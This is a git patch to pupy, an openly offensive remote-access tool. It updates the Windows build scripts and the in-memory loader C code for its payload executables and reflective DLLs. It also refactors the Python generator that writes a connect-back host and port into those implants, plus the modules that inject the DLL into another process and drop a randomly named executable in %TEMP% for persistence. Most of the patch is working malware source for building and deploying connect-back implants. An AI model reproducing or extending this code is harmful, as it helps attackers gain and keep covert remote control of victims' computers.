From 390929f3165d760d2731e67b45e6e8c419d760f8 Mon Sep 17 00:00:00 2001 From: n1nj4sec Date: Thu, 24 Sep 2015 20:28:25 +0200 Subject: [PATCH] msvcr90 in memory loading + code cleanup --- .gitignore | 28 ++++++++++++++++++++++++++-- client/sources/make.bat | 8 ++++++-- client/sources/makex64.bat | 7 +++++-- client/sources/pupy_load.c | 24 +++++++++++++++--------- pupy/genpayload.py | 22 +++++++++++++++++----- pupy/modules/migrate.py | 4 ++-- pupy/modules/persistence.py | 2 +- 7 files changed, 72 insertions(+), 23 deletions(-) diff --git a/.gitignore b/.gitignore index b5969083..e916ea7d 100644 --- a/.gitignore +++ b/.gitignore @@ -1,9 +1,33 @@ -#pupy +#pupy stuff pupy/data/ pupy/.pupy_history .DS_Store -# do not ignore package files + +# do not ignore package & templates files !pupy/packages/ +!pupy/payload_templates/ + +#do not redistribute microsoft visual C++ DLLs (LICENSE) +client/sources/resources/msvcr90.dll +client/sources/resources/msvcr90_x86.dll +client/sources/resources/msvcr90_x64.dll + +#Client build related stuff +*.obj +*.lib +*.exp +*.exe +*.dll +client/sources/resources_bootloader_pyc.c +client/sources/resources_bootloader.pyc +client/sources/resources_python27_dll.c +client/sources/resources/library_compressed_string.txt +client/sources/resources/python27.dll +client/sources/resources_library_compressed_string_txt.c +client/sources/resources/library_compressed_string_x86.txt +client/sources/resources/library_compressed_string_x64.txt +client/sources/resources_msvcr90_dll.c + # Byte-compiled / optimized / DLL files __pycache__/ diff --git a/client/sources/make.bat b/client/sources/make.bat index b1569e5f..ccb40ab4 100644 --- a/client/sources/make.bat +++ b/client/sources/make.bat @@ -9,12 +9,15 @@ copy resources\python27_x86.dll resources\python27.dll copy resources\library_compressed_string_x86.txt resources\library_compressed_string.txt "C:\\Python27\\python.exe" gen_resource_header.py resources\library_compressed_string.txt "C:\\Python27\\python.exe" gen_resource_header.py resources\python27.dll +copy resources\msvcr90_x86.dll resources\msvcr90.dll +"C:\\Python27\\python.exe" gen_resource_header.py resources\msvcr90.dll "C:\\Python27\\python.exe" gen_python_bootloader.py "C:\\Python27\\python.exe" gen_resource_header.py resources\bootloader.pyc ::compile them to obj files : "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c resources_library_compressed_string_txt.c "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c resources_bootloader_pyc.c "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c resources_python27_dll.c +"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c resources_msvcr90_dll.c ::then compile @@ -31,8 +34,9 @@ copy resources\library_compressed_string_x86.txt resources\library_compressed_st "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c thread.c "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c remote_thread.c "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c base_inject.c /IC:\Python27\include -"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" main_exe.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj /Fepupyx86.exe -"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" main_reflective.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj ReflectiveLoader.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj /Fepupyx86.dll /LD +"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" main_exe.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx86.exe + +"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" main_reflective.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj ReflectiveLoader.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx86.dll /LD copy pupyx86.dll ..\..\pupy\payloads\ copy pupyx86.exe ..\..\pupy\payloads\ diff --git a/client/sources/makex64.bat b/client/sources/makex64.bat index bbce2e31..ea27f57b 100644 --- a/client/sources/makex64.bat +++ b/client/sources/makex64.bat @@ -10,11 +10,14 @@ copy resources\library_compressed_string_x64.txt resources\library_compressed_st copy resources\python27_x64.dll resources\python27.dll "C:\\Python27\\python.exe" gen_resource_header.py resources\python27.dll "C:\\Python27\\python.exe" gen_python_bootloader.py +copy resources\msvcr90_x64.dll resources\msvcr90.dll +"C:\\Python27\\python.exe" gen_resource_header.py resources\msvcr90.dll "C:\\Python27\\python.exe" gen_resource_header.py resources\bootloader.pyc ::compile them to obj files : "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c resources_library_compressed_string_txt.c "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c resources_bootloader_pyc.c "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c resources_python27_dll.c +"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\adm64\cl.exe" /c resources_msvcr90_dll.c ::then compile @@ -31,8 +34,8 @@ copy resources\python27_x64.dll resources\python27.dll "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c thread.c /D_WIN64 "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c remote_thread.c /D_WIN64 "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c base_inject.c /IC:\Python27\include /D_WIN64 -"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" main_exe.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj /Fepupyx64.exe /D_WIN64 -"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" main_reflective.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj ReflectiveLoader.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj /Fepupyx64.dll /LD /D_WIN64 +"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" main_exe.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx64.exe /D_WIN64 +"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" main_reflective.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj ReflectiveLoader.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx64.dll /LD /D_WIN64 copy pupyx64.dll ..\..\pupy\payloads\ copy pupyx64.exe ..\..\pupy\payloads\ diff --git a/client/sources/pupy_load.c b/client/sources/pupy_load.c index 3ba3f51e..028f8471 100644 --- a/client/sources/pupy_load.c +++ b/client/sources/pupy_load.c @@ -17,6 +17,8 @@ extern const char resources_python27_dll_start[]; extern const int resources_python27_dll_size; extern const char resources_bootloader_pyc_start[]; extern const int resources_bootloader_pyc_size; +extern const char resources_msvcr90_dll_start[]; +extern const int resources_msvcr90_dll_size; extern const char resource_python_manifest[]; extern DL_EXPORT(void) init_memimporter(void); @@ -41,19 +43,22 @@ DWORD WINAPI mainThread(LPVOID lpArg) char * ppath; FILE * f; char tmp_python_dll_path[MAX_PATH]; - char tmp_manifest_path[MAX_PATH]; + //char tmp_manifest_path[MAX_PATH]; char tmp_path[MAX_PATH]; ACTCTX ctx; BOOL activated; HANDLE k32; - HANDLE (WINAPI *CreateActCtx)(PACTCTX pActCtx); - BOOL (WINAPI *ActivateActCtx)(HANDLE hActCtx, ULONG_PTR *lpCookie); - void (WINAPI *AddRefActCtx)(HANDLE hActCtx); - BOOL (WINAPI *DeactivateActCtx)(DWORD dwFlags, ULONG_PTR ulCookie); + //HANDLE (WINAPI *CreateActCtx)(PACTCTX pActCtx); + //BOOL (WINAPI *ActivateActCtx)(HANDLE hActCtx, ULONG_PTR *lpCookie); + //void (WINAPI *AddRefActCtx)(HANDLE hActCtx); + //BOOL (WINAPI *DeactivateActCtx)(DWORD dwFlags, ULONG_PTR ulCookie); PyGILState_STATE restore_state; - //InitializeCriticalSection(&csInit); + _load_python("msvcr90.dll", resources_msvcr90_dll_start); // needed for the python interpreter + GetTempPath(MAX_PATH, tmp_path); + //InitializeCriticalSection(&csInit); + /* k32 = LoadLibrary("kernel32"); CreateActCtx = (void*)GetProcAddress(k32, "CreateActCtxA"); ActivateActCtx = (void*)GetProcAddress(k32, "ActivateActCtx"); @@ -66,7 +71,6 @@ DWORD WINAPI mainThread(LPVOID lpArg) return 0; } - GetTempPath(MAX_PATH, tmp_path); ZeroMemory(&ctx, sizeof(ctx)); ctx.cbSize = sizeof(ACTCTX); GetTempFileName(tmp_path, "tmp", 0, tmp_manifest_path); @@ -88,12 +92,12 @@ DWORD WINAPI mainThread(LPVOID lpArg) #ifndef QUIET DeleteFile(tmp_manifest_path); #endif - + */ if(!Py_IsInitialized) { int res=0; - activated = ActivateActCtx(MyActCtx, &actToken); + //activated = ActivateActCtx(MyActCtx, &actToken); if(!_load_python("python27.dll", resources_python27_dll_start)){ #ifndef QUIET @@ -177,11 +181,13 @@ DWORD WINAPI mainThread(LPVOID lpArg) //if (PyErr_Occurred()) // PyErr_Print(); Py_Finalize(); + /* if (!DeactivateActCtx(0, actToken)){ #ifndef QUIET printf("LOADER: Error deactivating context!\n!"); #endif } + */ //DeleteCriticalSection(&csInit); return 0; diff --git a/pupy/genpayload.py b/pupy/genpayload.py index f5737a12..d7c11182 100755 --- a/pupy/genpayload.py +++ b/pupy/genpayload.py @@ -19,6 +19,18 @@ import argparse import sys import os.path +def get_edit_pupyx86_dll(host, ip): + return get_edit_binary(os.path.join("payload_templates","pupyx86.dll"), host, ip) + +def get_edit_pupyx64_dll(host, ip): + return get_edit_binary(os.path.join("payload_templates","pupyx64.dll"), host, ip) + +def get_edit_pupyx86_exe(host, ip): + return get_edit_binary(os.path.join("payload_templates","pupyx86.exe"), host, ip) + +def get_edit_pupyx64_exe(host, ip): + return get_edit_binary(os.path.join("payload_templates","pupyx64.exe"), host, ip) + def get_edit_binary(path, host, ip): binary=b"" with open(path, 'rb') as f: @@ -45,35 +57,35 @@ def get_edit_binary(path, host, ip): if __name__=="__main__": parser = argparse.ArgumentParser(description='Process some integers.') - parser.add_argument('-t', '--type', default='exe_x86', help="exe_x86/dll_x86 exe_x64/dll_x64 (default: exe_x86)") + parser.add_argument('-t', '--type', default='exe_x86', choices=['exe_x86','exe_x64','dll_x86','dll_x64'], help="(default: exe_x86)") parser.add_argument('-o', '--output', help="output path") parser.add_argument('-p', '--port', type=int, default=443, help="connect back ip (default:443)") parser.add_argument('host', help="connect back host") args=parser.parse_args() outpath=None if args.type=="exe_x86": - binary=get_edit_binary(os.path.join("payloads","pupyx86.exe"), args.host, args.port) + binary=get_edit_pupyx86_exe(args.host, args.port) outpath="pupyx86.exe" if args.output: outpath=args.output with open(outpath, 'wb') as w: w.write(binary) elif args.type=="exe_x64": - binary=get_edit_binary(os.path.join("payloads","pupyx64.exe"), args.host, args.port) + binary=get_edit_pupyx64_exe(args.host, args.port) outpath="pupyx64.exe" if args.output: outpath=args.output with open(outpath, 'wb') as w: w.write(binary) elif args.type=="dll_x64": - binary=get_edit_binary(os.path.join("payloads","pupyx64.dll"), args.host, args.port) + binary=get_edit_pupyx64_dll(args.host, args.port) outpath="pupyx64.dll" if args.output: outpath=args.output with open(outpath, 'wb') as w: w.write(binary) elif args.type=="dll_x86": - binary=get_edit_binary(os.path.join("payloads","pupyx86.dll"), args.host, args.port) + binary=get_edit_pupyx86_dll(args.host, args.port) outpath="pupyx86.dll" if args.output: outpath=args.output diff --git a/pupy/modules/migrate.py b/pupy/modules/migrate.py index 14cb3f25..e2a250bd 100644 --- a/pupy/modules/migrate.py +++ b/pupy/modules/migrate.py @@ -39,10 +39,10 @@ class MigrateModule(PupyModule): if self.client.conn.modules['pupwinutils.processes'].is_process_64(args.pid): isProcess64bits=True self.success("process is 64 bits") - dllbuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx64.dll"), host, port) + dllbuff=genpayload.get_edit_pupyx64_dll(host, port) else: self.success("process is 32 bits") - dllbuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx86.dll"), host, port) + dllbuff=genpayload.get_edit_pupyx86_dll(host, port) self.success("injecting DLL in target process %s ..."%args.pid) self.client.conn.modules['pupy'].reflective_inject_dll(args.pid, dllbuff, isProcess64bits) self.success("DLL injected !") diff --git a/pupy/modules/persistence.py b/pupy/modules/persistence.py index 9b9af87f..9f08aeb6 100644 --- a/pupy/modules/persistence.py +++ b/pupy/modules/persistence.py @@ -27,7 +27,7 @@ class PersistenceModule(PupyModule): self.info("generating exe ...") #generating exe - exebuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx86.exe"), host, port) + exebuff=genpayload.get_edit_pupyx86_exe(host, port) remote_path=self.client.conn.modules['os.path'].expandvars("%TEMP%\\{}.exe".format(''.join([random.choice(string.ascii_lowercase) for x in range(0,random.randint(6,12))]))) self.info("uploading to %s ..."%remote_path)